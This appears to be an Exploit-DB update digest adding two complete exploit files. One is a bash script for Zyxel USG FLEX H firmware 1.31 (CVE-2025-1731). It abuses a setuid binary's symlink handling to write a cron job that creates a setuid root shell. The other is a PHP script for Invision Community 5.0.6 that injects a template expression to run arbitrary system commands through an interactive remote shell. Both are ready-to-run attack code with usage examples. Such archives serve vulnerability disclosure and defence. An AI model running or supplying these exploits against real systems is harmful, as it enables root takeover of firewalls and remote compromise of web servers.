DB: 2025-05-19

4 changes to exploits/shellcodes/ghdb

Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation

CrushFTP 11.3.1 - Authentication Bypass

Invision Community 5.0.6 - Remote Code Execution (RCE)

Author: Exploit-DB

exploits/multiple/local/52293.bash

@@ -0,0 +1,131 @@
+# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
+# Date: 2025-04-23
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.zyxel.com/
+# Version: Zyxel uOS V1.31 (see
+https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=
+=3D
+advisory-for-incorrect-permission-assignment-and-improper-privilege-managem=
+=3D
+ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
+# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel
+FLEX200H with Firmware V1.31(ABWV.0)
+# CVE: CVE-2025-1731
+
+#!/bin/sh
+
+#
+# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
+# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# "So we wait, this is our labour... we wait."
+#               -- Anthony Swofford on fuzzing
+#
+# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
+# Zyxel with some of their appliances follows symbolic links in the `/tmp`
+# directory when run with the `register-status` argument. This allows local
+# users with access to a Linux OS shell to trick the program into creating
+# writable files at arbitrary locations in the filesystem. This vulnerability
+# can be exploited to overwrite arbitrary files or locally escalate privileges
+# from low-privileged user (e.g., `postgres`) to root.
+#
+# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
+# exploitation of this vulnerability and may also cause all sorts of havoc.
+#
+# ## Vulnerability information
+#
+# * CVE ID - CVE-2025-1731
+# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
+#
+# ## Relevant links
+#
+# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
+# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
+# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
+# * https://security.humanativaspa.it/tag/zyxel/
+#
+# ## Usage example
+#
+# ```
+# $ ./raptor_fermion
+# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
+# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# [*] Exploiting /usr/sbin/fermion-wrapper
+# $ uname -a
+# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
+# $ id
+# uid=502(postgres) gid=502(postgres) groups=502(postgres)
+# $ ls -l /usr/sbin/fermion-wrapper
+# -rwsr-xr-x 1 root root 44288 Jan  9 05:34 /usr/sbin/fermion-wrapper
+# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
+#
+# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
+# $ ls -l /etc/cron.d/runme
+# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
+# $ cat /etc/cron.d/runme
+# * * * * *   cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
+#
+# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
+#
+# [about one hour later...]
+#
+# $ ls -l /tmp/pwned
+# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
+# $ /tmp/pwned -p
+# # id
+# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
+# # R00t D4nc3!!!111! \o/
+# ```
+#
+# ## Tested on
+#
+# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
+# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
+#
+# *Note: other products and firmware versions may also be vulnerable.*
+#
+# ## Special thanks
+#
+# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
+#
+
+echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
+echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
+echo
+
+target="/usr/sbin/fermion-wrapper"
+tmpfile="/tmp/register_status"
+runme="/etc/cron.d/runme"
+shell="/tmp/pwned"
+
+echo "[*] Exploiting $target"
+echo "$ uname -a"
+uname -a
+echo "$ id"
+id
+echo "$ ls -l $target"
+ls -l $target
+
+umask 0
+rm $tmpfile
+ln -s $runme /tmp/register_status
+$target register-status
+echo "* * * * *   cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme
+
+if [ "`cat $runme 2>/dev/null`" = "" ]; then
+	echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
+	exit 1
+fi
+
+echo
+echo "[+] Everything looks good \\o/, wait an hour and check $shell"
+echo "$ ls -l $runme"
+ls -l $runme
+echo "$ cat $runme"
+cat $runme
+
+echo
+echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
+echo

exploits/multiple/remote/52294.php

@@ -0,0 +1,56 @@
+<?php
+
+
+/*
+    ---------------------------------------------------------------------------
+    Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
+    ---------------------------------------------------------------------------
+
+    author..............: Egidio Romano aka EgiX
+    mail................: n0b0d13s[at]gmail[dot]com
+    software link.......: https://invisioncommunity.com
+
+    +-------------------------------------------------------------------------+
+    | This proof of concept code was written for educational purpose only.    |
+    | Use it at your own risk. Author will be not responsible for any damage. |
+    +-------------------------------------------------------------------------+
+
+    [-] Original Advisory:
+
+    https://karmainsecurity.com/KIS-2025-02
+*/
+
+set_time_limit(0);
+error_reporting(E_ERROR);
+
+print "\n+-------------------------------------------------------------------+";
+print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
+print "\n+-------------------------------------------------------------------+\n";
+
+if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
+
+if ($argc != 2)
+{
+	print "\nUsage......: php $argv[0] <URL>\n";
+	print "\nExample....: php $argv[0] http://localhost/invision/";
+	print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
+	die();
+}
+
+$ch = curl_init();
+
+$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
+
+curl_setopt($ch, CURLOPT_URL, $argv[1]);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
+
+while (1)
+{
+	print "\ninvision-shell# ";
+	if (($cmd = trim(fgets(STDIN))) == "exit") break;
+	$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
+	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
+	preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
+}